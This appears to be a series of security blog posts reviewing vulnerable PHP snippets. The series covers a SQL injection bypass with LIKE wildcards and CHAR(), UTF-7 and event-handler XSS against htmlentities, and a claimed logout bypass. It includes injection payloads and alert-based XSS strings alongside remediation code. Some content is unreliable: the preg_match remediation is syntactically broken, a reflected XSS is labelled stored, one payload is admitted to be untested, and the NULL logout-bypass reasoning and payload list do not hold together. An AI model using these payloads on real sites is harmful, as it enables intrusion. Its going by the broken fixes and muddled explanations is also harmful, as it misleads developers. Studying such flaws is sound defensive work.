<span style="font-family: cambria; font-size: 12pt; font-weight: 700;">Step2: </span><span style="font-family: cambria; font-size: 12pt;">The same payload mutated to bypass the filter. CHAR() builds the pattern from character codes (37 is %, 115 is s), so the string %s is produced server-side without any quote character being sent, and mysql_real_escape_string has nothing to escape. Like any function call, it is only evaluated if the value reaches the query outside a string literal.</span><br />
<pre style="background-image: URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3qbnxnkiTVXh1m2Lc3yBHbRBwca8_HFqWV3dH01ibUvc8zTXkZE4_pZNJbKCH4RmmEjgcfKerS1or5Rc58PG8oDqXqsNVdJueFXeZPolRCvh45wJaR0HeJ-UtdwIQ9_D0AtkDX5jfwmd-/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"> LIKE CHAR(37, 115) </code></pre>
<br />
<div class="column">
<span style="font-family: cambria; font-size: 12pt; font-weight: 700;">Note2: </span><span style="font-family: cambria; font-size: 12pt;">Further expanding on the attack: if the web application does not enforce a standard format for usernames, the adversary can brute-force the first letter of a victim's username, e.g. try all English letters </span><span style="color: rgb(141, 179, 226); font-family: cambria; font-size: 12pt; font-style: italic;">LIKE 'a%', LIKE 'b%', LIKE 'c%' </span><span style="font-family: cambria; font-size: 12pt;">... and eventually execute the query with a valid first letter. Translated to the obfuscated form this is </span><span style="color: rgb(141, 179, 226); font-family: cambria; font-size: 12pt; font-style: italic;">LIKE CHAR(97, 37), LIKE CHAR(98, 37) </span><span style="font-family: cambria; font-size: 12pt;">etc.
</span><br />
<span style="font-family: "cambria"; font-size: 12.000000pt; font-weight: 700;"><br /></span>
<span style="font-family: cambria; font-size: 12pt; font-weight: 700;">Note3: </span><span style="color: rgb(84, 141, 212); font-family: cambria; font-size: 12pt; font-style: italic;">The mysql_real_escape_string </span><span style="font-family: cambria; font-size: 12pt;">function is deprecated as of PHP 5.5.0 and was removed in PHP 7.0.0. Instead, the MySQLi or PDO_MySQL extension should be used. Alternatives to this function include </span><span style="color: rgb(84, 141, 212); font-family: cambria; font-size: 12pt; font-style: italic;">mysqli_real_escape_string </span><span style="font-family: cambria; font-size: 12pt;">and </span><span style="color: rgb(84, 141, 212); font-family: cambria; font-size: 12pt; font-style: italic;">PDO::quote, </span><span style="font-family: cambria; font-size: 12pt;">but both are still escaping functions with the same blacklist limits; parameterized queries are the proper fix. The </span><span style="color: rgb(141, 179, 226); font-family: cambria; font-size: 12pt; font-style: italic;">mysql_query() </span><span style="font-family: cambria; font-size: 12pt;">function sends a single statement (multiple statements are not supported, so stacked queries are not an option here) to the currently active database on the server associated with the specified link_identifier. For a DELETE it returns TRUE whenever the statement executed without error, whether or not any row matched; it does not tell you that a record was found. In this code the redirect to myPosts.php therefore happens even when nothing was deleted, so a failed ownership check looks exactly like success. The number of rows actually removed must be read with </span><span style="color: rgb(141, 179, 226); font-family: cambria; font-size: 12pt; font-style: italic;">mysql_affected_rows() </span><span style="font-family: cambria; font-size: 12pt;">(affected_rows with mysqli), and anything other than exactly one row should be treated as a failure.</span><br />
<span style="font-family: cambria; font-size: 12pt; font-weight: 700;"><br /></span>
<span style="font-family: cambria; font-size: 12pt; font-weight: 700;">Note4: </span><span style="font-family: cambria; font-size: 12pt;">The whole ext/mysql extension is deprecated as of PHP 5.5.0 and removed as of PHP 7.0.0.</span><br />
<span style="font-family: "cambria"; font-size: 12pt;"><br /></span>
<span style="font-family: "cambria"; font-size: 12pt;">Remedial Code:</span><br />
<span style="font-family: "cambria"; font-size: 12pt;"><br /></span>
<span style="font-family: cambria; font-size: 12pt;">Remediate on the server side: replace the string-built query with a strongly typed, parameterized one (</span><span style="color: rgb(84, 141, 212); font-family: cambria; font-size: 12pt; font-style: italic;">bind_param </span><span style="font-family: cambria; font-size: 12pt;">with mysqli, or PDO prepared statements), keep the postId cast to int, and check the affected-row count after executing so that a deletion that touched no row is reported as a failure instead of redirecting as if it succeeded.</span><br />
<div class="column">
<pre style="background-image: URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3qbnxnkiTVXh1m2Lc3yBHbRBwca8_HFqWV3dH01ibUvc8zTXkZE4_pZNJbKCH4RmmEjgcfKerS1or5Rc58PG8oDqXqsNVdJueFXeZPolRCvh45wJaR0HeJ-UtdwIQ9_D0AtkDX5jfwmd-/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"> // Using prepared statements (mysqli): the values never become part of the SQL text.
$postId = (int) $_GET['postId'];
$username = $_SESSION['username'];
if ($stmt = $mysqli->prepare("DELETE FROM posts WHERE PostId = ? AND Username = ? LIMIT 1"))
{
    $stmt->bind_param('is', $postId, $username); // Bind both placeholders: integer PostId, string Username.
    $stmt->execute(); // Execute the prepared statement.
    $deleted = $stmt->affected_rows; // 1 = this user's post was removed; 0 = no such post, or not the owner.
    $stmt->close();
    ...
}
</code></pre>
</div>
</div>
<br />
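As an added, runnable illustration of the point made in this post (it is not code from the original article), the following Python script uses sqlite3 in place of MySQL and a stand-in for mysql_real_escape_string. It shows that a username holding a LIKE wildcard survives escaping untouched and deletes another user's post as soon as the ownership check is done with LIKE, while the same value is harmless against the page's = comparison and against a parameterized DELETE; it also returns the affected-row count that the PHP code never looks at. The table layout, the user names, the attacker's username and the escape stand-in are assumptions of the example.

```python
import sqlite3

# Constructed sample data (not from the original post): two users, one post each.
SEED_ROWS = [
    (1, "user01", "first post of user01"),
    (2, "user02", "first post of user02"),
]


def make_db():
    """Fresh in-memory posts table, seeded with SEED_ROWS."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE posts (PostId INTEGER PRIMARY KEY, Username TEXT, Body TEXT)")
    conn.executemany("INSERT INTO posts VALUES (?, ?, ?)", SEED_ROWS)
    conn.commit()
    return conn


def escape_like_php(value):
    """Stand-in for mysql_real_escape_string(): handles only the characters the PHP
    manual lists and leaves the LIKE wildcards % and _ alone. Quotes are doubled
    (SQLite style) rather than backslash-escaped so the literal stays valid in SQLite;
    what matters here is the blacklist, not the exact escape sequence (assumption)."""
    out = []
    for ch in value:
        if ch in "'\"":
            out.append(ch + ch)
        elif ch in "\x00\n\r\x1a\\":
            out.append("\\" + ch)
        else:
            out.append(ch)
    return "".join(out)


def delete_post_escaped(conn, username, post_id, owner_match="="):
    """The page's pattern: escape the value, then concatenate it into the SQL text.
    owner_match is '=' (as on the page) or 'LIKE' (what the page's payloads assume)."""
    sql = "DELETE FROM posts WHERE PostId = %d AND Username %s '%s'" % (
        int(post_id), owner_match, escape_like_php(username))
    cur = conn.execute(sql)
    conn.commit()
    return cur.rowcount  # rows actually deleted; the PHP code never checks this


def delete_post_parameterized(conn, username, post_id):
    """Hardened form: placeholders, typed values, and the affected-row count is the
    authorization signal (0 means the post does not exist or is not this user's)."""
    cur = conn.execute(
        "DELETE FROM posts WHERE PostId = ? AND Username = ?", (int(post_id), username))
    conn.commit()
    return cur.rowcount


def demo():
    """Attacker's session username is 'user0%'; target is post 2, owned by user02.
    Returns the number of rows each strategy deleted."""
    results = {}
    conn = make_db()
    results["escaped_eq"] = delete_post_escaped(conn, "user0%", 2, "=")      # % is literal
    results["escaped_like"] = delete_post_escaped(conn, "user0%", 2, "LIKE")  # % is a wildcard
    conn = make_db()
    results["parameterized"] = delete_post_parameterized(conn, "user0%", 2)   # no match
    results["owner"] = delete_post_parameterized(conn, "user02", 2)           # real owner
    return results


if __name__ == "__main__":
    print(demo())
```

The takeaway is the last two lines of demo(): with placeholders the attacker's wildcard buys nothing, and the caller can tell a successful deletion (1 row) from a rejected one (0 rows) instead of redirecting blindly.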
<div class="column">
<span style="font-family: cambria; font-size: 12pt; font-weight: 700;">Note: </span><span style="font-family: cambria; font-size: 12pt;">Blacklist filtering of SQL keywords such as LIKE and CHAR is sometimes proposed as an additional countermeasure. It is easily bypassed (case changes, comments, alternative functions) and must never stand in for parameterized queries; if a LIKE comparison on user-controlled data is genuinely needed, the % and _ wildcards in the value have to be escaped explicitly as well.
</span><br />
<span style="font-family: "cambria"; font-size: 12.000000pt; font-weight: 700;"><br /></span>
<span style="font-family: "cambria"; font-size: 12.000000pt; font-weight: 700;">References:
</span><br />
<ol>
<li style="font-family: Cambria; font-size: 12pt;"><a href="http://php.net/manual/en/function.mysql-real-escape-string.php" target="_blank">http://php.net/manual/en/function.mysql-real-escape-string.php</a></li>
<li style="font-family: Cambria; font-size: 12pt;"><a href="http://dev.mysql.com/doc/refman/5.0/en/pattern-matching.html" target="_blank">http://dev.mysql.com/doc/refman/5.0/en/pattern-matching.html</a></li>
<li style="font-family: Cambria; font-size: 12pt;"><a href="http://php.net/manual/en/function.mysql-query.php" target="_blank">http://php.net/manual/en/function.mysql-query.php</a></li>
<li style="font-family: Cambria; font-size: 12pt;"><a href="http://www.php.net/manual/en/pdo.query.php" target="_blank">http://www.php.net/manual/en/pdo.query.php</a></li>
<li style="font-family: Cambria; font-size: 12pt;"><a href="http://stackoverflow.com/questions/7069640/are-there-any-security-benefits-to-using-pdoquery-vs-mysql-query" target="_blank">http://stackoverflow.com/questions/7069640/are-there-any-security-benefits-to-using-pdoquery-vs-mysql-query</a></li>
</ol>
</div>
<div class="blogger-post-footer">Penetest Horror Blog</div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-7947080244954191821.post-83371762191390819842014-04-15T17:06:00.002-07:002017-01-12T14:35:01.001-08:00PHP Source Code Chunks of Insanity (Post Pages) Part 3<b>Intro </b><br />
<br />
This post is going to talk about PHP source code review and demonstrate how a relatively small chunk of code can cause you a lot of problems.<br />
<b><br /></b><b>The Code</b><br />
<br />
In this article we are going to analyze the code displayed below. The code might seem innocent to some, but obviously it is not. We are going to assume that it is used by some web site to post user comments securely.<br />
<pre style="background-color: #f0f0f0; background-position: initial initial; background-repeat: initial initial; border: 1px dashed rgb(204, 204, 204); height: auto; overflow: auto; padding: 0px; text-align: left; width: 99%;"><div class="column" style="color: black; line-height: 20px;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><?php
require_once 'common.php';
validateMySession();
</span>?>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><html>
<head>
<title>User Posts</title>
</head>
<body>
<h1>Showing current posts</h1>
<form action='awsomePosts.php'></span></div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><span style="line-height: 20px;"> <p>MySearch: <input type='text' </span></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><span style="line-height: 20px;"> value='<?php if (isset($_GET['search'])) echo htmlentities($_GET['search'])?>'></p>
<p><input type='submit' value='MySearch'></p></span></span>
<div style="color: black; line-height: 20px;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> </form>
<?php showAwsomePosts();?>
</body> </span></div>
<div style="color: black; line-height: 20px;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"></html></span></div>
</pre>
If you look carefully at the code you will see that it is vulnerable to the following issue: Stored XSS!!<br />
<span style="font-family: "cambria"; font-size: 12pt;"> </span><br />
Think this is not accurate? Think better.<br />
<br />
<b>The Stored XSS</b><br />
<span style="font-family: "cambria"; font-size: 12pt;"><br /></span>
<span style="font-family: "cambria"; font-size: 12pt;">An adversary would need to have very good knowledge of encoding/XSS attacks to exploit this
vulnerability. This vulnerability is based on a well known UTF-‐7 encoding attack that is considered to
be old. Other filter bypassing techniques can be used to bypass htmlentities such as JavaScript events.</span><br />
<span style="font-family: "cambria"; font-size: 12.000000pt;"><br /></span>
<span style="font-family: "cambria"; font-size: 12pt;">Vulnerable Code:</span><span style="font-family: "cambria"; font-size: 12.000000pt;"> </span><br />
<pre style="background-color: #f0f0f0; border: 1px dashed rgb(204, 204, 204); font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; width: 646.4630737304688px;"><code style="word-wrap: normal;">1: <p>MySearch: <input type='text' value='<?php if (isset($_GET['search'])) echo htmlentities($_GET['search'])?>'></p>// Vulnerable to XSS UTF-‐7 attack
</code></pre>
<div>
<span style="font-family: "cambria"; font-size: 12pt;">The page that the potential XSS resides on doesn't provide a page charset header (e.g. </span><span style="color: rgb(32.941180% , 55.294120% , 83.137260%); font-family: "cambria"; font-size: 12pt; font-style: italic;">header('Content-‐
Type: text/html; charset=UTF-‐8'); </span><span style="font-family: "cambria"; font-size: 12pt;">or </span><span style="color: rgb(32.941180% , 55.294120% , 83.137260%); font-family: "cambria"; font-size: 12pt; font-style: italic;"><HEAD><META HTTP-‐EQUIV="CONTENT-‐TYPE"
CONTENT="text/html; charset=UTF-‐8">), </span><span style="font-family: "cambria"; font-size: 12pt;">any browser that is set to UTF-‐7 encoding can be exploited
with the following XSS input (she don't need the charset statement if the user's browser is set to auto-‐
detect and there is no overriding content-‐types on the page in Internet Explorer and Netscape
rendering engine mode). This does not work in any modern browser without changing the encoding
type.</span><br />
<u style="font-family: Cambria; font-size: 12pt;"><br /></u>
<u style="font-family: Cambria; font-size: 12pt;">Example1 UTF-‐7 Encoding</u></div>
<div class="column">
<br />
<span style="font-family: "cambria"; font-size: 12.000000pt;">Input Payload :<br />
</span><br />
<pre style="background-color: #f0f0f0; border: 1px dashed rgb(204, 204, 204); font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; width: 646.4630737304688px;"><code style="word-wrap: normal;">1: <script>alert(1)</script>
</code></pre>
<div>
<code style="word-wrap: normal;"><br /></code></div>
<span style="font-family: "cambria"; font-size: 12.000000pt;">Output (UTF-‐7): </span><br />
<pre style="background-image: URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3qbnxnkiTVXh1m2Lc3yBHbRBwca8_HFqWV3dH01ibUvc8zTXkZE4_pZNJbKCH4RmmEjgcfKerS1or5Rc58PG8oDqXqsNVdJueFXeZPolRCvh45wJaR0HeJ-UtdwIQ9_D0AtkDX5jfwmd-/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">1: +ADw-‐script+AD4-‐alert('XSS')+ADw-‐/script+AD4APA-‐/vulnerable+AD4-‐
</code></pre>
<span style="font-family: "cambria"; font-size: 12.000000pt;"><br /></span><span style="font-family: "cambria"; font-size: 12.000000pt;"><u>Example2 JavaScript Events</u></span></div>
<span style="font-family: "cambria"; font-size: 12pt;"><br /></span>
<span style="font-family: "cambria"; font-size: 12pt;">Injecting also JavaScript events to the htmlentities function of php will also by pass the filter.</span><br />
<span style="font-family: "cambria"; font-size: 12pt;"><br /></span>
<span style="font-family: "cambria"; font-size: 12pt;">The code before injection: </span><br />
<pre style="background-color: #f0f0f0; border: 1px dashed rgb(204, 204, 204); font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; width: 646.4630737304688px;"><code style="word-wrap: normal;">1<p>MySearch: <input type='text' value='<?php if (isset($_GET['search'])) echo htmlentities($_GET['search'])?>'></p>
</code></pre>
<span style="font-family: "cambria"; font-size: 12pt;"><br /></span>
<span style="font-family: "cambria"; font-size: 12.000000pt;">The code after injection:</span><br />
<pre style="background-image: URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3qbnxnkiTVXh1m2Lc3yBHbRBwca8_HFqWV3dH01ibUvc8zTXkZE4_pZNJbKCH4RmmEjgcfKerS1or5Rc58PG8oDqXqsNVdJueFXeZPolRCvh45wJaR0HeJ-UtdwIQ9_D0AtkDX5jfwmd-/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"><p>MySearch: <input type='text' value='onerror='alert(String.fromCharCode(88, 83, 83))'></p>
</code></pre>
<div class="column">
<span style="font-family: "cambria"; font-size: 12.000000pt; font-weight: 700;"><br /></span>
<br />
<div class="column">
<span style="font-family: "cambria"; font-size: 12.000000pt; font-weight: 700;">Note: </span><span style="font-family: "cambria"; font-size: 12.000000pt;">This example needs further testing to see if it is applicable.
</span><br />
<span style="font-family: "cambria"; font-size: 12.000000pt;"><br /></span>
<span style="font-family: "cambria"; font-size: 12pt;">Remedial Code:
</span><br />
<span style="font-family: "cambria"; font-size: 12.000000pt;"><br /></span>
<span style="font-family: "cambria"; font-size: 12.000000pt;">Provide Server Side filters for the vulnerability. Make use of regular expressions and html encode the
variables whether displayed back to the user or not.
</span><br />
<span style="font-family: "cambria"; font-size: 12.000000pt;"><br /></span>
<span style="font-family: "cambria"; font-size: 12.000000pt;"><u>1st Layer of defense </u></span></div>
<pre style="background-image: URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3qbnxnkiTVXh1m2Lc3yBHbRBwca8_HFqWV3dH01ibUvc8zTXkZE4_pZNJbKCH4RmmEjgcfKerS1or5Rc58PG8oDqXqsNVdJueFXeZPolRCvh45wJaR0HeJ-UtdwIQ9_D0AtkDX5jfwmd-/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">1: //XSS filter the value because this value might be printed later on back in the user. if preg_match ("/[a-‐zA-‐Z]+/", "", $search){
2: showPosts();
3: }
</code></pre>
<span style="font-family: "cambria"; font-size: 12pt; font-weight: 700;">Note: </span><span style="font-family: "cambria"; font-size: 12pt;">Using regular expressions to replace parts of the input and proceed with further processing the
input is not recommended, once a malicious input is identified should be rejected (e.g. using
</span><span style="color: rgb(32.941180% , 55.294120% , 83.137260%); font-family: "cambria"; font-size: 12pt; font-style: italic;">preg_match </span><span style="font-family: "cambria"; font-size: 12pt;">instead of </span><span style="color: rgb(32.941180% , 55.294120% , 83.137260%); font-family: "cambria"; font-size: 12pt; font-style: italic;">preg_replace).</span><br />
<span style="color: rgb(32.941180% , 55.294120% , 83.137260%); font-family: "cambria"; font-size: 12.000000pt; font-style: italic;"><br /></span>
<u><span style="font-family: "cambria"; font-size: 12pt;">2nd Layer of defense</span><span style="color: rgb(32.941180% , 55.294120% , 83.137260%); font-family: "cambria"; font-size: 12.000000pt; font-style: italic;"> </span></u><br />
<pre style="background-image: URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3qbnxnkiTVXh1m2Lc3yBHbRBwca8_HFqWV3dH01ibUvc8zTXkZE4_pZNJbKCH4RmmEjgcfKerS1or5Rc58PG8oDqXqsNVdJueFXeZPolRCvh45wJaR0HeJ-UtdwIQ9_D0AtkDX5jfwmd-/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">1: header('Content-‐Type: text/html; charset=UTF-‐8');
2: // This function will convert both double and single quotes. mb_convert_encoding($search, 'UTF-‐8');
</code></pre>
<span style="font-family: "cambria"; font-size: 12.000000pt; font-weight: 700;"><br /></span>
<br />
<div class="column">
<span style="font-family: "cambria"; font-size: 12.000000pt; font-weight: 700;">Countermeasures Summarized
</span><br />
<ol style="list-style-type: decimal;">
<li style="font-family: 'Cambria'; font-size: 12.000000pt;">
<span style="font-family: "cambria"; font-size: 12.000000pt;">Specify charset clearly (HTTP header is recommended)
</span><br />
</li>
<li style="font-family: 'Cambria'; font-size: 12.000000pt;">
<span style="font-family: "cambria"; font-size: 12.000000pt;">Don't place the text attacker can control before <meta>
</span><br />
</li>
<li style="font-family: 'Cambria'; font-size: 12.000000pt;">
<span style="font-family: "cambria"; font-size: 12.000000pt;">Specify recognizable charset name by browser.
</span><br />
</li>
<li style="font-family: 'Cambria'; font-size: 12.000000pt;">
<span style="font-family: "cambria"; font-size: 12.000000pt;">Apply regular expressions based on the white list mentality.
</span><br />
</li>
</ol>
<span style="font-family: "cambria"; font-size: 12.000000pt; font-weight: 700;">Note: </span><span style="color: rgb(32.941180% , 55.294120% , 83.137260%); font-family: "cambria"; font-size: 12.000000pt; font-style: italic;">mb_convert_encoding </span><span style="font-family: "cambria"; font-size: 12.000000pt;">converts the character encoding of the input string to the desired
encoding. </span></div>
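As an added example that is not code from the original post, the two layers of defense and the countermeasure list above can be combined into one hardened version of the search form. The helper names (sendCharsetHeader, isValidSearch, encodeForAttribute, renderSearchForm) are assumptions, and the sample inputs are constructed from the payloads shown earlier in the post.<br />

```php
<?php
// Added example, not code from the original post. Helper names are assumptions.
declare(strict_types=1);

// Countermeasure 1: declare the charset in the HTTP header before any
// attacker-controlled text reaches the browser, so the browser never has to
// guess (or be talked into) UTF-7.
function sendCharsetHeader(): void
{
    header('Content-Type: text/html; charset=UTF-8');
}

// 1st layer of defense, whitelist style: the anchors ^ and $ make the pattern
// describe the whole value, and anything else is rejected rather than
// "cleaned" with preg_replace.
function isValidSearch(string $search): bool
{
    return preg_match('/^[a-zA-Z0-9 ]{1,64}$/', $search) === 1;
}

// 2nd layer of defense: output encoding. ENT_QUOTES encodes both " and ', so a
// value cannot close the single-quoted attribute it is printed into;
// ENT_SUBSTITUTE with the explicit charset replaces invalid UTF-8 byte
// sequences instead of making htmlentities return an empty string.
function encodeForAttribute(string $value): string
{
    return htmlentities($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Builds the form. Input that fails the whitelist is refused outright and is
// never echoed back, not even inside the error message.
function renderSearchForm(?string $rawSearch): string
{
    $value = '';
    if ($rawSearch !== null) {
        if (!isValidSearch($rawSearch)) {
            return "<p>Invalid search term.</p>\n";
        }
        $value = encodeForAttribute($rawSearch);
    }
    return "<form action='awsomePosts.php'>\n"
         . "<p>MySearch: <input type='text' name='search' value='{$value}'></p>\n"
         . "<p><input type='submit' value='MySearch'></p>\n"
         . "</form>\n";
}

if (PHP_SAPI === 'cli') {
    // Constructed samples: a normal term, then the UTF-7 payload and the
    // JavaScript-event payload quoted in the post. Both are rejected.
    $samples = [
        'security',
        "+ADw-script+AD4-alert('XSS')+ADw-/script+AD4-",
        "'onerror='alert(String.fromCharCode(88, 83, 83))'",
    ];
    foreach ($samples as $s) {
        echo renderSearchForm($s);
    }
    // The encoder on its own, for pages that must accept a wider character set.
    echo encodeForAttribute("it's \"quoted\" <b>"), "\n";
} else {
    sendCharsetHeader();
    echo renderSearchForm($_GET['search'] ?? null);
}
```

Run it from the command line to see the three sample inputs classified; under a web server it behaves as the original page did, minus the vulnerability. The whitelist is deliberately narrow; if a search box must accept punctuation, widen the character class rather than dropping the anchors, and keep the output encoding as the second line of defense.<br />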
<span style="font-family: "cambria"; font-size: 12.000000pt; font-weight: 700;"><br /></span>
<span style="font-family: "cambria"; font-size: 12.000000pt; font-weight: 700;">References:
</span><br />
<span style="font-family: "cambria"; font-size: 12.000000pt; font-weight: 700;"><br /></span>
<span style="font-family: "cambria"; font-size: 12.000000pt;">1. </span><span style="color: rgb(0.000000% , 0.000000% , 100.000000%); font-family: "cambria"; font-size: 12.000000pt;"><a href="https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#UTF-%C2%AD%E2%80%907_encoding">https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#UTF-‐7_encoding</a> </span><br />
<span style="font-family: "cambria"; font-size: 12.000000pt;">2. </span><span style="color: rgb(0.000000% , 0.000000% , 100.000000%); font-family: "cambria"; font-size: 12.000000pt;"><a href="http://php.net/manual/en/function.mb-%C2%AD%E2%80%90convert-%C2%AD%E2%80%90encoding.php">http://php.net/manual/en/function.mb-‐convert-‐encoding.php</a><br />
</span><span style="font-family: "cambria"; font-size: 12.000000pt;">3. </span><span style="color: rgb(0.000000% , 0.000000% , 100.000000%); font-family: "cambria"; font-size: 12.000000pt;"><a href="http://shiflett.org/blog/2005/dec/google-%C2%AD%E2%80%90xss-%C2%AD%E2%80%90example">http://shiflett.org/blog/2005/dec/google-‐xss-‐example</a><br />
</span><span style="font-family: "cambria"; font-size: 12.000000pt;">4. </span><span style="color: rgb(0.000000% , 0.000000% , 100.000000%); font-family: "cambria"; font-size: 12.000000pt;"><a href="http://www.motobit.com/util/charset-%C2%AD%E2%80%90codepage-%C2%AD%E2%80%90conversion.asp" target="_blank">http://www.motobit.com/util/charset-‐codepage-‐conversion.asp</a></span><br />
<span style="font-family: "cambria"; font-size: 12.000000pt;">5. </span><span style="color: rgb(0.000000% , 0.000000% , 100.000000%); font-family: "cambria"; font-size: 12.000000pt;"><a href="http://openmya.hacker.jp/hasegawa/security/utf7cs.html">http://openmya.hacker.jp/hasegawa/security/utf7cs.html</a> </span><br />
<span style="font-family: "cambria"; font-size: 12.000000pt;">6. </span><span style="color: rgb(0.000000% , 0.000000% , 100.000000%); font-family: "cambria"; font-size: 12.000000pt;"><a href="http://wiremask.eu/?p=tutorials&id=10" target="_blank">http://wiremask.eu/?p=tutorials&id=10 </a></span></div>
<br />
<br /><div class="blogger-post-footer">Penetest Horror Blog</div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-7947080244954191821.post-75468527300068111112014-04-15T16:20:00.000-07:002017-01-12T14:35:07.349-08:00PHP Source Code Chunks of Insanity (Logout Pages) Part 2<b>Intro </b><br />
<br />
This post is going to talk about PHP source code review and demonstrate how a relatively small chunk of code can cause you a lot of problems.<br />
<b><br /></b>
<b>The Code</b><br />
<br />
In this article we are going to analyze the code displayed below. The code might seem innocent to some, but obviously it is not. We are going to assume that it is used by some web site to de-validate the user credentials and allow users to log out securely.<br />
<div>
<br /></div>
<pre style="background-image: URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3qbnxnkiTVXh1m2Lc3yBHbRBwca8_HFqWV3dH01ibUvc8zTXkZE4_pZNJbKCH4RmmEjgcfKerS1or5Rc58PG8oDqXqsNVdJueFXeZPolRCvh45wJaR0HeJ-UtdwIQ9_D0AtkDX5jfwmd-/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">1: <?php
2: require_once 'common.php';
3: if (isset($_SESSION['username']))//Insecure source
4: {
5: session_unset();// In properly destroyed session.
6: }
7: header('Location: index.php'); ?> </code></pre>
<span style="font-family: "cambria"; font-size: 12pt;"><br /></span>
<br />
If you look carefully at the code you will see that it is vulnerable to the following issues:<br />
<ol>
<li>
<span style="font-family: "cambria"; font-size: 12.000000pt;">NULL De-Authentication Bypass </span></li>
<li>
<span style="font-family: "cambria"; font-size: 12.000000pt;">No Proper Session Termination </span></li>
</ol>
Think this is not accurate? Think better.<br />
<span style="font-family: "cambria"; font-size: 12pt;"><br /></span>
<span style="font-family: "cambria"; font-size: 16.363636016845703px;"><b>NULL De-Authentication Bypass </b></span><br />
<span style="font-family: "cambria"; font-size: 12pt;"><br /></span>
<span style="font-family: "cambria"; font-size: 12pt;">Exploitation:</span><br />
<div>
<div class="column">
<span style="font-family: "cambria"; font-size: 12.000000pt; font-weight: 700;"><br /></span>
<span style="font-family: "cambria"; font-size: 12.000000pt;">An adversary may on purpose exploit this vulnerability possibly without the need of developing any
costume tools (but needs a good understanding of PHP design flaws). More specifically an adversary
can manipulate the cookie parameter and de-‐validate the logout process by injecting a NULL value in
the begging of the username (after the authentication). This would result into maintaining the user
Web resources available for the specific session-‐id even after the logout is performed. </span><br />
<span style="font-family: "cambria"; font-size: 12pt;"><br /></span>
<span style="font-family: "cambria"; font-size: 12pt;">Vulnerable Code:</span><span style="font-family: "cambria"; font-size: 12pt;"> </span></div>
</div>
<pre style="background-image: URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3qbnxnkiTVXh1m2Lc3yBHbRBwca8_HFqWV3dH01ibUvc8zTXkZE4_pZNJbKCH4RmmEjgcfKerS1or5Rc58PG8oDqXqsNVdJueFXeZPolRCvh45wJaR0HeJ-UtdwIQ9_D0AtkDX5jfwmd-/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">if (isset($_SESSION['username']))// Malicious de-validation cancel
</code></pre>
<span style="font-family: "cambria"; font-size: 12pt;">Assuming that the target username is user12 potential malicious payloads that could exploit the
vulnerability displayed above would be </span><span style="color: #8db3e2; font-family: "cambria"; font-size: 12pt; font-style: italic;">user[space]12 , %4e%55%4c%4c,user12, user12[space],
%20user12, [space] [space]user12 [space],user12 , user12, user12,, user12NULL NULLuser12
</span><span style="font-family: "cambria"; font-size: 12pt;">etc. This is applicable due to the fact that if multiple parameters are supplied then the </span><span style="color: #8db3e2; font-family: "cambria"; font-size: 12pt; font-style: italic;">isset </span><span style="font-family: "cambria"; font-size: 12pt;">will return
TRUE only if all of the parameters are set. Evaluation goes from left to right and stops as soon as an
unset variable is encountered. The attack should occur after the user successfully authenticates her
self.</span><br />
<span style="font-family: "cambria"; font-size: 12pt; font-weight: 700;"><br /></span>
